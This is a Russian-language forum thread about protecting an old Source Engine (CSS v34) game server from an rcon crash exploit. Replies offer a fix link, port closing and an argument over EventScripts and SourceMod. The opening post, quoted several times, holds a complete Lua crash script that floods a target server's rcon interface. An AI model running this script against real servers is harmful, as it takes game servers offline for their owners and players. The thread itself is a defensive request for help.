как защитить сервер от rcon crash exploita

[Рлпшп Одшодлодло]

всем привет! кто знает как защититься от этого краш эксплоита?
setCVar("sv_rcon_minfailuretime","9999999999999999999")
setCVar("sv_rcon_minfailures","999999999999999999999")
setCVar("sv_rcon_minfailures","99999999999999999999999")
setCVar("sv_rcon_banpenalty","1")
cmd('rcon_address сюда ip сервера')
cmd("rcon_password %N 10000000000000000")
for i=1,70 do
cmd("rcon")
end
cmd("clear")

может подскажите плагин который защитит от этой дыры..

 

[pihmih]

А как это работает?

 

[Sokret]

всем привет! кто знает как защититься от этого краш эксплоита?
setCVar("sv_rcon_minfailuretime","9999999999999999999")
setCVar("sv_rcon_minfailures","999999999999999999999")
setCVar("sv_rcon_minfailures","99999999999999999999999")
setCVar("sv_rcon_banpenalty","1")
cmd('rcon_address сюда ip сервера')
cmd("rcon_password %N 10000000000000000")
for i=1,70 do
cmd("rcon")
end
cmd("clear")

может подскажите плагин который защитит от этой дыры..

Выложи полный код это не полный

 

[Lev]

всем привет! кто знает как защититься от этого краш эксплоита?
setCVar("sv_rcon_minfailuretime","9999999999999999999")
setCVar("sv_rcon_minfailures","999999999999999999999")
setCVar("sv_rcon_minfailures","99999999999999999999999")
setCVar("sv_rcon_banpenalty","1")
cmd('rcon_address сюда ip сервера')
cmd("rcon_password %N 10000000000000000")
for i=1,70 do
cmd("rcon")
end
cmd("clear")

может подскажите плагин который защитит от этой дыры..

Посмотри Тут
Fix for rcon crash exploit

 

[pilot1992]

всем привет! кто знает как защититься от этого краш эксплоита?
setCVar("sv_rcon_minfailuretime","9999999999999999999")
setCVar("sv_rcon_minfailures","999999999999999999999")
setCVar("sv_rcon_minfailures","99999999999999999999999")
setCVar("sv_rcon_banpenalty","1")
cmd('rcon_address сюда ip сервера')
cmd("rcon_password %N 10000000000000000")
for i=1,70 do
cmd("rcon")
end
cmd("clear")

может подскажите плагин который защитит от этой дыры..

просто закрой tcp порты и делов то.. правда сам рконом воспользоватся не сможешь

 

[DarklSide]

Рлпшп Одшодлодло, EventScripts в топку.
Оффтоп

А если нет, rcon_lock EventScripts on sourcemod.

 

[Vit_ amin]

Рлпшп Одшодлодло, EventScripts в топку.
Оффтоп

А если нет, rcon_lock EventScripts on sourcemod.

Я поражаюсь таким людям как ты. Факт того, что у него установлен Event Scripts еще даже не установлен, а ты уже утверждаешь причем уверенно это.
Судя по lua скрипту он будет работать только на Source Engine 2007 (CSS v34), так как там имеется уязвимость с консольными командами sv_rcon_*
На Source Engine 2009 (CSS OrangeBox) данная уязвимость устранена.
P.S. Если ты ничего не знаешь об EventScript лучше помолчи. На OrangeBox данная платформа стабильна, просто непопулярна, в старых версиях действительна были 1-2 проблемы. Но 80% взломов было из-за Event Scripts Tools ...

 

[DarklSide]

Vit_ amin, оффтоп раскрывает утверждение...
Сообщение от DarklSide: EventScripts в топку. // Да? Нет?

1. Рлпшп Одшодлодло: Да, EventScripts в топку.
Вывод:
a. У него не установлен EventScript и не думает его ставить.
b. У него был установлен EventScript и послал он её - на четвёртую сторону.

2. Рлпшп Одшодлодло: Нет, EventScripts не в топку.
Сообщение от DarklSide: Оффтоп -

- А если нет, rcon_lock EventScripts on sourcemod.

Факт того, что у него установлен Event Scripts еще даже не установлен, а ты уже утверждаешь причем уверенно это.

Сообщение от DarklSide: оффтоп раскрывает утверждение...

 

[Vit_ amin]

rcon_lock - не нужен, если и пошло на то, можно защитить сервер и на Event Scripts. так как появился Python Extension, не вижу смысла совмещать две платформы.
P.S. Если на старой версии нету Event Scripts Tools то можно защититься даже этим

 

[DarklSide]

Vit_ amin, даже если rcon_lock не нужен и сервер чисто на EventScripts... И сервер работает на седьмом протоколе,
смыл совмещать - не будет требоваться, если найдеться эффективный античит(аим, триггер, и т.д.) на EventScripts.